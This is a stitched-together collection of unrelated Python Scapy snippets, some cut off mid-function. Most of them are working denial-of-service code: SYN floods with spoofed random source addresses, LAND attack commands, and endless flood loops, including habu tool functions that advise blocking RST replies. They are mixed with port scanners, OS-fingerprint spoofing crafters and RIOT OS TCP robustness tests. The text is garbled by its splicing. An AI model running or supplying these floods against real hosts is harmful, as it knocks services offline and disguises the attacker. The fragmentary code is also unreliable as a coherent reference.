def run(self):
# Damn, ugly!
global forging
if forging:
i = IP()
i.dst = ip
if spoofing:
i.src = '.'.join(
random.randint(1, 254) for _ in range(4))
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
try:
send(i / t, verbose=0)
except PermissionError:
print('ohno, not forging')
forging = False
else:
s = socket.socket()
s.connect((self.ip, self.port))
def cmd_land(ip, count, port, iface, verbose):
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def test_send_ack_instead_of_syn(child, src_if, src_ll, dst_if, dst_l2, dst_ll,
dst_port):
# check if any debug output is generated during `@testfunc` decorator
# execution. If so, send fewer packets to prevent the target node
# from being overwhelmed by packets and output.
debug = child.expect(
[pexpect.TIMEOUT, r'GNRC_TCP: Enter "\S+", File: .+\(\d+\)\s'],
timeout=1)
if debug:
count = 10
else:
count = 1000
# see https://github.com/RIOT-OS/RIOT/pull/12001
provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=")
tcp_hdr = TCP(provided_data)
assert provided_data == raw(tcp_hdr)
# set destination port to application specific port
tcp_hdr.dport = dst_port
sendp(Ether(dst=dst_l2) / IPv6(src=src_ll, dst=dst_ll) / tcp_hdr,
iface=src_if,
verbose=0,
count=count)
# check if server actually still works
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as sock:
sock.settimeout(child.timeout)
addr_info = socket.getaddrinfo(dst_ll + '%' + src_if,
dst_port,
type=socket.SOCK_STREAM)
sock.connect(addr_info[0][-1])
child.expect_exact('gnrc_tcp_open_passive: returns 0')
verify_pktbuf_empty(child)
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None,
target_ip=None, target_port=None,
interface=None, duration=None, gap=0):
'''
Starts Syn Flood attacks
Arguments:
origin_ip (str): attacker ip
origin_port (int): attacker port
target_ip (str): target ip
target_port (int): target port
interface (str): network interface to use
duration (int): duration of the attack
gap (int): gap (delay) between packets
Returns:
None
'''
# Check if everything is filled out
if target_ip is None:
return
if target_port is None:
return
if duration is None:
return
if gap >= duration:
return
# Prepare the packet
ip_layer = IP()
ip_layer.src = origin_ip
ip_layer.dst = target_ip
tcp_layer = TCP()
tcp_layer.sport = origin_port
tcp_layer.dport = target_port
tcp_layer.flags = "S"
# Prepare timings
time_start = time()
time_end = time_start + duration
# Start attack
while (time() <= time_end): #duration
# Constantly changing values
tcp_layer.seq = GenerateRandomSafeSeq()
tcp_layer.ack = GenerateRandomSafeSeq()
tcp_layer.window = GenerateRandomWindow()
attack_packet = ip_layer/tcp_layer # packet to send
send(attack_packet, iface=interface)
if gap > 0:
sleep(gap) #gap
def configureTCPPacket(port):
TCP_Packet = TCP()
TCP_Packet.dport = port
TCP_Packet.flags = "S" # SYN
TCP_Packet.seq = getRand()
TCP_Packet.sport = getRand()
TCP_Packet.window = getRand()
return TCP_Packet
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.dport = self.port
t.flags = 'S'
print "Spoofing %s to send SYN ..." % i.src
sr1(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = self.port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i/t, verbose=0)
def run(self):
packet_ip = IP()
packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254))
packet_ip.dst = self.host
packet_tcp = TCP()
packet_tcp.sport = random.randint(1024, 65535)
packet_tcp.dport = self.port
packet_tcp.flags = 'S'
send(packet_ip/packet_tcp)
def ecn_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['ECN']['TTL'], 16)
ip_flag = fp.probe['ECN']['DF']
if ip_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0
ip.id = fp.ip_id_gen()
tcp = TCP()
w_val = fp.probe['ECN']['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
cc_val = fp.probe['ECN']['CC']
if cc_val == 'Y':
tcp.flags = 0x52
elif cc_val == 'N':
tcp.flags = 0x12
elif cc_val == 'S':
tcp.flags = 0xD2
else:
tcp.flags = 0x10
o_val = fp.probe['ECN']['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def is_port_open(ip_addr, port, timeout=5, verbose=False):
ip = IP()
ip.dst = ip_addr
syn = TCP()
syn.sport = choice(range(1000, 50000))
syn.dport = port
syn.flags = 'S'
syn.seq = 1
packet = ip/syn
synack = sr1(packet, timeout=timeout, verbose=verbose)
if synack and synack.sprintf('%TCP.flags%') == 'SA':
return True
return False
def sendSYN(host, port):
# Create an IP Packet using random ip as source and the target IP as destination
ipPacket = IP()
ipPacket.src = ".".join(
map(str, (random.randint(0, 255) for i in range(4))))
ipPacket.dst = host
# Create a TCP segment using a random source port and the target port as the destination
tcpSegment = TCP()
tcpSegment.sport = random.randint(1000, 65535)
tcpSegment.dport = port
# Set the syn flag
tcpSegment.flags = 'S'
# Send the composition of the two (package/segment) and ignore the result
send(ipPacket / tcpSegment, verbose=0)
pass
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
else:
print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("Please, remember to block your RST responses", file=sys.stderr)
while True:
if forgeip:
pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit(
'.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
def test_gnrc_tcp_garbage_packets_ack_instead_of_sym(child):
""" This test verfies that sending and ACK instead of a SYN.
doesn't break GNRC_TCP.
"""
# Setup RIOT as server
with RiotTcpServer(child, generate_port_number()) as riot_srv:
# Construct HostTcpClient to lookup node properties
host_cli = HostTcpClient(riot_srv)
# Try to accept incoming connection from host system.
# Use timeout of 15s discarding 1000 packages can take a while on smaller platforms
child.sendline('gnrc_tcp_accept 15000')
# Check if debug output is enabled. Send fewer packets on if it is disabled
# To ensure that the amount of generated output doesn't break the test
debug = child.expect(
[pexpect.TIMEOUT, r'GNRC_TCP: Enter "\S+", File: .+\(\d+\)\s'],
timeout=1)
if debug:
count = 10
else:
count = 1000
# see https://github.com/RIOT-OS/RIOT/pull/12001
provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=")
tcp_hdr = TCP(provided_data)
assert provided_data == raw(tcp_hdr)
# set destination port to application specific port
tcp_hdr.dport = int(riot_srv.listen_port)
sendp(Ether(dst=riot_srv.mac) /
IPv6(src=host_cli.address, dst=riot_srv.address) / tcp_hdr,
iface=host_cli.interface,
verbose=0,
count=count)
# check if server actually still works
with host_cli:
child.expect_exact('gnrc_tcp_accept: returns 0')
riot_srv.close()
def syn_flood(ip_destination, port_destination, limit):
total = 0
print("Enviando Pacotes")
for x in range(0, limit):
ip_packet = IP()
ip_packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
ip_packet.dst = ip_destination
tcp_packet = TCP()
tcp_packet.sport = random.randint(1000, 9000)
tcp_packet.dport = port_destination
tcp_packet.flags = "S"
tcp_packet.seq = random.randint(1000, 9000)
tcp_packet.window = random.randint(1000, 9000)
print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
send(ip_packet / tcp_packet, verbose=0)
total += 1
print("All packets sent")
def test_send_ack_instead_of_syn(child, src_if, src_ll, dst_if, dst_l2, dst_ll,
dst_port):
# see https://github.com/RIOT-OS/RIOT/pull/12001
provided_data = base64.b64decode("rwsQf2pekYLaU+exUBBwgPDKAAA=")
tcp_hdr = TCP(provided_data)
assert provided_data == raw(tcp_hdr)
# set destination port to application specific port
tcp_hdr.dport = dst_port
sendp(Ether(dst=dst_l2) / IPv6(src=src_ll, dst=dst_ll) / tcp_hdr,
iface=src_if,
verbose=0,
count=1000)
# check if server actually still works
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as sock:
sock.settimeout(child.timeout)
addr_info = socket.getaddrinfo(dst_ll + '%' + src_if,
dst_port,
type=socket.SOCK_STREAM)
sock.connect(addr_info[0][-1])
child.expect_exact('gnrc_tcp_open_passive: returns 0')
verify_pktbuf_empty(child)
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("[+] SYN packet sent!")
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(f"[{red} bold][✘] ERROR[/{red} bold] " +
f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
else:
print(f"[{green}][✔] SUCCESS[/{green}] " +
f"[{yellow}]SYN packet sent to[{yellow}] " +
f"[{blue}]{'{}:{}'.format(*target)}")
def server_tcp(self, flags, payload=b"", count=True):
data_length = max(len(payload), 1)
tcp = TCP()
tcp.flags = flags
tcp.sport = self.service
tcp.dport = self.client_port
tcp.seq = self.ss
tcp.ack = self.sa
if count:
self.ss += data_length
self.ca += data_length
packet = Ether(src=self.server.mac, dst=self.client.mac)
packet /= IP(src=self.server.ip, dst=self.client.ip)
packet /= tcp
if len(payload) > 0:
packet /= payload
self.packets.append(packet)
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
)
else:
print(
f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
)
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
"""Launch a lot of TCP connections and keeps them opened.
Some very old systems can suffer a Denial of Service with this.
Reference: https://en.wikipedia.org/wiki/SYN_flood
Example:
\b
# sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses.
If you use them, each connection will be sent from a random layer2 (MAC)
and/or layer3 (IP) address.
You can choose the number of connections to create with the option '-c'.
The default is never stop creating connections.
Note: If you send the packets from your real IP address and you want
to keep the connections half-open, you need to setup for firewall to
don't send the RST packets.
"""
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("Please, remember to block your RST responses", file=sys.stderr)
while True:
if forgeip:
pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit(
'.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
#!/usr/bin/python
from scapy.all import IP, TCP
a = IP()
a.src = "1.2.3.4"
a.dst = "10.0.2.15"
a.ihl = 5
b = TCP()
b.sport = 1551
b.dport = 23
b.seq = 1551
b.flags = 'S'
pkt = a/b
with open("packet", "wb") as f:
f.write(bytes(pkt))
print "Invalid syntax: ps.py [-u -t -i] <target IP> <p1[ p2 p3 ...]>"
else:
# TCP SYN
if sys.argv[1] == "-t":
print "TCP SYN scan on host " + sys.argv[2] + "\n"
ip = IP()
tcp = TCP()
# cast as str and int to avoid issues caused by periods
ip.dst = str(sys.argv[2])
# loop iterates through as many commandline arguments were given
for port in range(len(sys.argv) - 3):
print "Scanning port " + str(sys.argv[port + 3])
# port+3 is start of ports
tcp.dport = int(sys.argv[port + 3])
# send SYN packet
tcp.flags = "S"
packet = (ip / tcp)
# verbose=0 to limit console output; timeout 1s
status = sr1(packet, verbose=0, timeout=1)
if status:
print str(packet.dport) + " is open\n"
# UDP
elif sys.argv[1] == "-u":
print "UDP scan on host " + sys.argv[2] + "\n"
ip = IP()
udp = UDP()
# cast as str and int to avoid issues caused by periods
4567, # filenail (commonly open port for backdoors)
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print('Trying port %d' % port)
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
if rcv_pkt:
break
# check to see if host responded, quit if otherwise
4567, # filenail (commonly open port for backdoors)
]
# try each common port until one responds
for port in common_ports:
# assemble IP packet with target IP
ip = IP()
ip.dst = target_ip
# assemble TCP with dst port and SYN flag set
tcp = TCP()
tcp.dport = port
tcp.flags = 'S'
print 'Trying port %d' % port
# send the packet and wait 2 seconds for an answer
rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)
# if answered no need to try more ports
if rcv_pkt:
break
# check to see if host responded, quit if otherwise
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
"""Launch a lot of TCP connections and keeps them opened.
Some very old systems can suffer a Denial of Service with this.
Reference: https://en.wikipedia.org/wiki/SYN_flood
Example:
\b
# sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses.
If you use them, each connection will be sent from a random layer2 (MAC)
and/or layer3 (IP) address.
You can choose the number of connections to create with the option '-c'.
The default is never stop creating connections.
Note: If you send the packets from your real IP address and you want
to keep the connections half-open, you need to setup for firewall to
don't send the RST packets.
"""
conf.verb = False
if interface:
conf.iface = interface
layer2 = Ether()
layer3 = IP()
layer3.dst = ip
layer4 = TCP()
layer4.dport = port
pkt = layer2 / layer3 / layer4
counter = 0
print("Please, remember to block your RST responses", file=sys.stderr)
while True:
if forgeip:
pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
if forgemac:
pkt[Ether].src = RandMAC()
pkt[TCP].sport = randint(10000, 65000)
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
sendp(pkt)
counter += 1
if count != 0 and counter == count:
break
return True
def t2tot7_craft(pkt, fp, mac, tno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe[tno]['TTL'], 16)
ip.flags = fp.probe[tno]['DF']
ip.id = random.randint(1, 1000)
tcp = TCP()
s_val = fp.probe[tno]['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = pkt[TCP].ack + 369
a_val = fp.probe[tno]['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe[tno]['F']
tcp.flags = flag_val
w_val = fp.probe[tno]['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
o_val = fp.probe[tno]['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
rd_val = fp.probe[tno]['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
